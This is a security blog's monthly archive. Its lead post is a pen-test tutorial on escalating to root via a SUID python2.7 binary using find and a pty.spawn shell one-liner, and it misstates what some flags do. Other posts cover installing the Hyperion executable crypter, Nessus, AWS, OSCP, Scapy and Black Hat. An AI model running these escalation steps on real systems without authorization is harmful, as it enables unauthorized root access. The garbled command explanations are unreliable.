Month: September 2018

Posted on

Searching for binaries for privilege escalation exploit

During the attacking phase of a pen test once access has been gained to a shell, we can try to own the system through a privilege escalation exploit in order to obtain root access. We can verify the system identification of the user by using the following command to ascertain SUID permissions:

$ id
uid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),114(bluetooth)

Then we can use the following command, to find a list of executable file SUID permissions on the system:

find / -perm -u=s -type f 2>/dev/null

Here, the find command will search from root (/) looking for user SUID permissions configured to execute (-perm -u=s), and to find directories (-type f). The result of this search, will be redirected to standard error and use a null device to suppress output (2>/dev/null).

Example show below:

$ find / -perm -u=s 2>/dev/null
/sbin/mount.nfs
/usr/sbin/exim4
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/python2.7
/usr/bin/chsh
/usr/bin/at
/usr/bin/mawk
/usr/bin/chfn
/usr/bin/procmail
/usr/bin/passwd
/bin/su
/bin/umount
/bin/mount

Note that if redirect to stdout (>) or (1>) was used instead of stderr (2>), we would see a list of permission denied errors. As given from the above example, we could look to use Python2.7 binary in an attempt to gain root access using a privilege escalation exploit. We can use the following command to achieve this in using our above example:

/usr/bin/python2.7 -c ‘import pty;pty.spawn(“/bin/sh”)’

This command will get a TTY shell after a reverse shell connection using Python2.7. This should result in the system permitting root access, and this can be seen from the following commands:

# id
uid=1000(user) gid=1000(user) euid=0(root) groups=1000(user),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),114(bluetooth)
# whoami
root

We can see that the system user now has root access, denoted from the above by euid=0(root) and root identified from whoami command.

Posted on

Amazon AWS VPC Components

Amazon AWS VPC consists of the following components:

  1. Internet Gateways or Virtual Private Gateways (note that a VPC can have only one internet gateway)
  2. Route Tables
  3. Network Access Control lists (NACLs), applied at the subnet level and is stateless
  4. Security Groups, applied at the instance level and is stateful
  5. VPC traffic can be logged via Flowlogs
Posted on

Example bash script for cloud environments

The following bash script example, is a script which can be used to automate some basic tasks, associated with setting up a virtual resource, such as an Amazon AWS EC2 instance:

#!/bin/bash
yum update -y
yum install httpd -y
service httpd start
chkconfig httpd on
aws s3 cp s3:///index.html /var/www/html/

What this bash script will perform on your behalf, will update the instance repositories (yum update), and also install Apache web server (install httpd). This particular script was used in Amazon AWS for an EC2 instance and a static website hosted on a S3 bucket storage resource.

The script will also ensure that the Apache web server will persist during system reboots (chkconfig), and the last instruction, will copy the contents between locations.

Posted on

List of Tenable Nessus plugins

AIX Local Security Checks
Amazon Linux Local Security Checks
Backdoors
Brute force attacks
CentOS Local Security Checks
CGI abuses
CGI abuses : XSS
CISCO
Databases
Debian Local Security Checks
Default Unix Accounts
Denial of Service
DNS
F5 Networks Local Security Checks
Fedora Local Security Checks
Firewalls
FreeBSD Local Security Checks
FTP
Gain a shell remotely
General
Gentoo Local Security Checks
HP-UX Local Security Checks
Huawei Local Security Checks
Incident Response
Junos Local Security Checks
MacOS X Local Security Checks
Mandriva Local Security Checks
Misc.
Netware
Oracle Linux Local Security Checks
OracleVM Local Security Checks
Palo Alto Local Security Checks
Peer-To-Peer File Sharing
PhotonOS Local Security Checks
Red Hat Local Security Checks
RPC
SCADA
Scientific Linux Local Security Checks
Service detection
Settings
Slackware Local Security Checks
SMTP problems
SNMP
Solaris Local Security Checks
SuSE Local Security Checks
Ubuntu Local Security Checks
Virtuozzo Local Security Checks
VMware ESX Local Security Checks
Web Servers
Windows
Windows : Microsoft Bulletins
Windows : User management

Posted on

Fix “Could not validate this preference file” in Nessus

If you receive the below error message when downloading the latest Nessus plugin updates, the following fix may help:

/opt/nessus/sbin/nessuscli update --plugins-only

----- Fetching the newest updates from nessus.org -----

Could not validate this preference file. Have installation files been copied from another system?
Nessus Plugins: Failed

The first step to fix the error, is to request a new activation code from Tenable for the Nessus program: Link.

Then you will need to register your new activation key, received by email and associate to Nessus:
/opt/nessus/sbin/nessuscli fetch --register

Posted on

Alien Vault – How to Prepare to Take the OSCP

Offensive Security Certified Professional (OSCP) – Most recognized penetration testing certification in the industry.

  1. Earn after passing the 24-hour performance based exam
  2. Pre-requisite Course: Penetration Testing with Kali Linux (PWK)
  3. Certification proves you have a clear and practical understanding of the penetration testing process and life-cycle
  4. Virtual network containing targets of varying configurations and operating systems
  5. An OSCP is able to identify vulnerabilities and execute attacks in a controlled and focused manner.

Alien Vault – How to Prepare to Take the OSCP: Link

Posted on

How to install Hyperion in Linux

Hyperion is a runtime encrypter for 32-bit portable executables. It is a reference implementation and bases on the paper “Hyperion: Implementation of a PE-Crypter”.

Hyperion is not included in Kali Linux repositories. To install Hyperion in Linux, run the following commands:

Download the files from Github:
wget https://github.com/nullsecuritynet/tools/raw/master/binary/hyperion/release/Hyperion-1.2.zip

Unzip the archive file:
unzip Hyperion-1.2.zip

Invoke the MingGW compiler to compile Hyperion in to a executable file:
i686-w64-mingw32-c++ Hyperion-1.2/Src/Crypter/*.cpp -o hyperion.exe

Posted on

How to install Ming C compiler in Linux

MinGW, a contraction of “Minimalist GNU for Windows”, is a minimalist development environment for native Microsoft Windows applications.

MinGW provides a complete Open Source programming tool set which is suitable for the development of native MS-Windows applications, and which do not depend on any 3rd-party C-Runtime DLLs. (It does depend on a number of DLLs provided by Microsoft themselves, as components of the operating system; most notable among these is MSVCRT.DLL, the Microsoft C runtime library. Additionally, threaded applications must ship with a freely distributable thread support DLL, provided as part of MinGW itself).

The Ming compiler is included in Kali Linux repositories, but is not installed by default. To install Ming C compiler in Linux, run the following command:

apt-get install mingw-w64

MinGW (mingw-w64) is the successor to mingw32.

Posted on

Using Scapy (Python packet manipulation program)

Scapy is a Python program that enables the user to send, sniff and dissect and forge network packets. This capability allows construction of tools that can probe, scan or attack networks.

In other words, Scapy is a powerful interactive packet manipulation program. It is able to forge or decode packets of a wide number of protocols, send them on the wire, capture them, match requests and replies, and much more. Scapy can easily handle most classical tasks like scanning, tracerouting, probing, unit tests, attacks or network discovery. It can replace hping, arpspoof, arp-sk, arping, p0f and even some parts of Nmap, tcpdump, and tshark).

Online guidance for using Scapy can be found here: Link

Posted on

Black Hat Europe 2018

Black Hat Europe 2018, at ExCeL London
3rd – 6th December 2018

Address: Royal Victoria Dock, 1 Western Gateway, London E16 1XL (map: Directions)

Site link: Black Hat Europe 2018

Black Hat provides attendees with the very latest in research, development, and trends in Information Security. Here the brightest professionals and researchers in the industry will come together for a total of four days—two or four days of deeply technical hands-on Trainings, followed by two days of the latest research and vulnerability disclosures in the Briefings.

For the list of training events, see link here: Training